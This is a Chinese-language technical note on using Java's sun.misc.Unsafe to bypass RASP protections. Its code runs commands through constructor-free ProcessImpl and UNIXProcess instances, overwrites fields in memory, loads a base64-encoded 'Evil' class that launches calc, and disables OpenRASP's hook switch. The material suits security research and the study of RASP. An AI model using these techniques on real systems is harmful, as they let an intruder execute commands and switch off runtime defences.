sun.misc.Unsafe
sun.misc.Unsafe提供了一些底层操作,如内存、CAS、类、对象
Unsafe是Java内部API,不允许外部调用
Copy /*
A collection of methods for performing low-level, unsafe operations. Although the class and all methods are public, use of this class is limited because only trusted code can obtain instances of it.
*/
public final class Unsafe {
private Unsafe() {}
private static final Unsafe theUnsafe = new Unsafe();
@CallerSensitive
public static Unsafe getUnsafe() {
Class<?> caller = Reflection.getCallerClass();
if (!VM.isSystemDomainLoader(caller.getClassLoader()))
throw new SecurityException("Unsafe");
return theUnsafe;
}
} Unsafe采用了单例模式,其getUnsafe()方法会先判断调用者(Reflection.getCallerClass();)的类加载器classLoader是否为Bootstrap Classloader
可以使用反射来获取Unsafe对象
Copy Class clazz = Class.forName("sun.misc.Unsafe");
Field getUnsafe = clazz.getDeclaredField("theUnsafe");
getUnsafe.setAccessible(true);
Unsafe unsafe = (Unsafe) getUnsafe.get(null); allocateInstance
若RASP限制了某些类的构造方法(比如TrAXFilter(加载字节码)、ProcessImpl(Windows命令执行)、UnixProcess(Linux命令执行))
可以用Unsafe的allocateInstance方法绕过这个限制
Google的GSON库在JSON反序列化的时候就使用这个方式来创建类实例
绕过命令执行限制
Windows版本:
Copy Class<?> clazz = Class.forName("sun.misc.Unsafe");
Field field = clazz.getDeclaredField("theUnsafe");
field.setAccessible(true);
Unsafe unsafe = (Unsafe) field.get(null);
Class<?> processImpl = Class.forName("java.lang.ProcessImpl");
Process process = (Process) unsafe.allocateInstance(processImpl);
Method create = processImpl.getDeclaredMethod("create", String.class, String.class, String.class, long[].class, boolean.class);
create.setAccessible(true);
long[] stdHandles = new long[]{-1L, -1L, -1L};
create.invoke(process, "whoami", null, null, stdHandles, false);
JavaIOFileDescriptorAccess fdAccess
= sun.misc.SharedSecrets.getJavaIOFileDescriptorAccess();
FileDescriptor stdout_fd = new FileDescriptor();
fdAccess.setHandle(stdout_fd, stdHandles[1]);
InputStream inputStream = new BufferedInputStream(
new FileInputStream(stdout_fd));
BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream));
String line;
while ((line = reader.readLine()) != null) {
System.out.println(line);
} Linux版本:
Copy String cmd = "whoami";
int[] ineEmpty = {-1, -1, -1};
Class clazz = Class.forName("java.lang.UNIXProcess");
Unsafe unsafe = Utils.getUnsafe();
Object obj = unsafe.allocateInstance(clazz);
Field helperpath = clazz.getDeclaredField("helperpath");
helperpath.setAccessible(true);
Object path = helperpath.get(obj);
byte[] prog = "/bin/bash\u0000".getBytes();
String paramCmd = "-c\u0000" + cmd + "\u0000";
byte[] argBlock = paramCmd.getBytes();
int argc = 2;
Method exec = clazz.getDeclaredMethod("forkAndExec", int.class, byte[].class, byte[].class, byte[].class, int.class, byte[].class, int.class, byte[].class, int[].class, boolean.class);
exec.setAccessible(true);
exec.invoke(obj, 2, path, prog, argBlock, argc, null, 0, null, ineEmpty, false); 注意这个方法并不会执行任何构造方法
有时候使用反射去创建实例时,会遇到各种复杂的类依赖关系,此时也可以考虑用这个去实例化对象
内存层面修改值
Copy package org.demo;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
public class UnsafeTest {
private int offset = 1;
private String cmd = "whoami";
static public String SECRET = "666";
public UnsafeTest() {
}
public int getOffset() {
return offset;
}
public String getCmd() {
try {
BufferedReader reader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));
StringBuilder builder = new StringBuilder();
String line;
while ((line = reader.readLine()) != null) {
builder.append(line);
builder.append(System.getProperty("line.separator"));
}
return builder.toString();
} catch (IOException e) {
throw new RuntimeException(e);
}
}
} 在JVM中,对实例的Field进行了有规律的存储,通过一个偏移量可以从内存中找到相应的Field值
Unsafe提供两个方法来获取Field的偏移量
staticFieldOffset(Field var1)和objectFieldOffset(Field var1)
获取偏移量后可以调用putObject、putInt等方法来修改对象的成员值
Copy Class clazz = Class.forName("sun.misc.Unsafe");
Field getUnsafe = clazz.getDeclaredField("theUnsafe");
getUnsafe.setAccessible(true);
Unsafe unsafe = (Unsafe) getUnsafe.get(null);
UnsafeTest unsafeTest = new UnsafeTest();
System.out.println(unsafeTest.getCmd());
Class test = Class.forName("org.demo.UnsafeTest");
Field cmd = test.getDeclaredField("cmd");
unsafe.putObject(unsafeTest, unsafe.objectFieldOffset(cmd), "calc");
System.out.println(unsafeTest.getCmd());
Field secret = test.getDeclaredField("SECRET");
unsafe.putObject(unsafeTest.getClass(), unsafe.staticFieldOffset(secret), "hacked");
System.out.println(unsafeTest.SECRET); 当Field的set方法被限制时,可以考虑这种方法绕过
但对final修饰的字段貌似改不了
defineClass
Unsafe提供了一个defineClass方法,传入类名、类字节码可以在JVM中注册一个类
Copy import sun.misc.Unsafe;
import java.lang.reflect.Field;
import java.security.CodeSource;
import java.security.ProtectionDomain;
import java.security.cert.Certificate;
import java.util.Base64;
public class test {
public static void main(String[] args) throws Exception {
// byte[] code = ClassPool.getDefault().getCtClass("Evil").toBytecode();
// System.out.println(Base64.getEncoder().encodeToString(code));
String CLASS_BYTE_Base64 = "yv66vgAAADQAKAoACQAYCgAZABoIABsKABkAHAcAHQcAHgoABgAfBwAgBwAhAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAAZMRXZpbDsBAAg8Y2xpbml0PgEAAWUBABVMamF2YS9pby9JT0V4Y2VwdGlvbjsBAA1TdGFja01hcFRhYmxlBwAdAQAKU291cmNlRmlsZQEACUV2aWwuamF2YQwACgALBwAiDAAjACQBAARjYWxjDAAlACYBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQAaamF2YS9sYW5nL1J1bnRpbWVFeGNlcHRpb24MAAoAJwEABEV2aWwBABBqYXZhL2xhbmcvT2JqZWN0AQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAGChMamF2YS9sYW5nL1Rocm93YWJsZTspVgAhAAgACQAAAAAAAgABAAoACwABAAwAAAAvAAEAAQAAAAUqtwABsQAAAAIADQAAAAYAAQAAAAMADgAAAAwAAQAAAAUADwAQAAAACAARAAsAAQAMAAAAZgADAAEAAAAXuAACEgO2AARXpwANS7sABlkqtwAHv7EAAQAAAAkADAAFAAMADQAAABYABQAAAAYACQAJAAwABwANAAgAFgAKAA4AAAAMAAEADQAJABIAEwAAABQAAAAHAAJMBwAVCQABABYAAAACABc=";
Class clazz = Class.forName("sun.misc.Unsafe");
Field getUnsafe = clazz.getDeclaredField("theUnsafe");
getUnsafe.setAccessible(true);
Unsafe unsafe = (Unsafe) getUnsafe.get(null);
// 获取系统的类加载器
ClassLoader classLoader = ClassLoader.getSystemClassLoader();
// 创建默认的保护域
ProtectionDomain domain = new ProtectionDomain(
new CodeSource(null, (Certificate[]) null), null, classLoader, null
);
byte[] b = Base64.getDecoder().decode(CLASS_BYTE_Base64);
unsafe.defineClass("Evil", b, 0, b.length, classLoader, domain);
Class.forName("Evil");
}
} 注意Unsafe#defineClass只能在JVM中define一个类,不会加载这个类,所以最后通过Class.forName来触发其静态代码块
defineAnonymousClass
defineAnonymousClass可以创建一个内部类
这个类的名字设置时甚至可以是已存在的类名,由于java动态编译特性会在内存中生成新的类名
无法通过Class.forName获取这个类的(do not make it known to the class loader)
这个类的classloader为null
Copy import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtMethod;
import sun.misc.Unsafe;
import java.io.File;
import java.lang.reflect.Field;
public class test {
public static void main(String[] args) throws Exception {
Class clazz = Class.forName("sun.misc.Unsafe");
Field getUnsafe = clazz.getDeclaredField("theUnsafe");
getUnsafe.setAccessible(true);
Unsafe unsafe = (Unsafe) getUnsafe.get(null);
ClassPool classPool = ClassPool.getDefault();
CtClass ctClass = classPool.makeClass("java.lang.String");
CtMethod toString = CtMethod.make("public String toString(){java.lang.Runtime.getRuntime().exec(\"calc\");return null;}", ctClass);
toString.setName("toString");
ctClass.addMethod(toString);
byte[] bytes = ctClass.toBytecode();
Class anonymous = unsafe.defineAnonymousClass(File.class, bytes, null);
System.out.println(anonymous.getName());
anonymous.newInstance().toString();
}
} 打印出类名为java.lang.String/1645995473,并弹出计算器
Java 11 把Unsafe的defineClass方法移除了,但defineAnonymousClass还在
Close RASP
一旦攻击者拿到了一个代码执行权限,那么他便可以通过反射的方式取得RASP运行在内存中的开关变量(多为boolean或者AtomicBoolean类型),并把它由true修改为false,就可以使RASP得的防护完全失效。开关变量只是其中一个思路,当然有更多的方法去破坏RASP的运行模式,如置空检测逻辑代码(如果RASP使用了js、lua等别的引擎),置空黑名单、添加白名单
Copy Class clazz = Class.forName("com.baidu.openrasp.HookHandler");
Unsafe unsafe = getUnsafe();
InputStream inputStream = clazz.getResourceAsStream(clazz.getSimpleName() + ".class");
byte[] data = new byte[inputStream.available()];
inputStream.read(data);
Class anonymousClass = unsafe.defineAnonymousClass(clazz, data, null);
Field field = anonymousClass.getDeclaredField("enableHook");
unsafe.putObject(clazz, unsafe.staticFieldOffset(field), new AtomicBoolean(false)); Summary
自定义类
defineAnonymousClass生成的类无法通过反射获取其内部信息,且类加载器为Bootstrap ClassLoader,会被认为jdk自带的类
Reference
Last updated 4 months ago
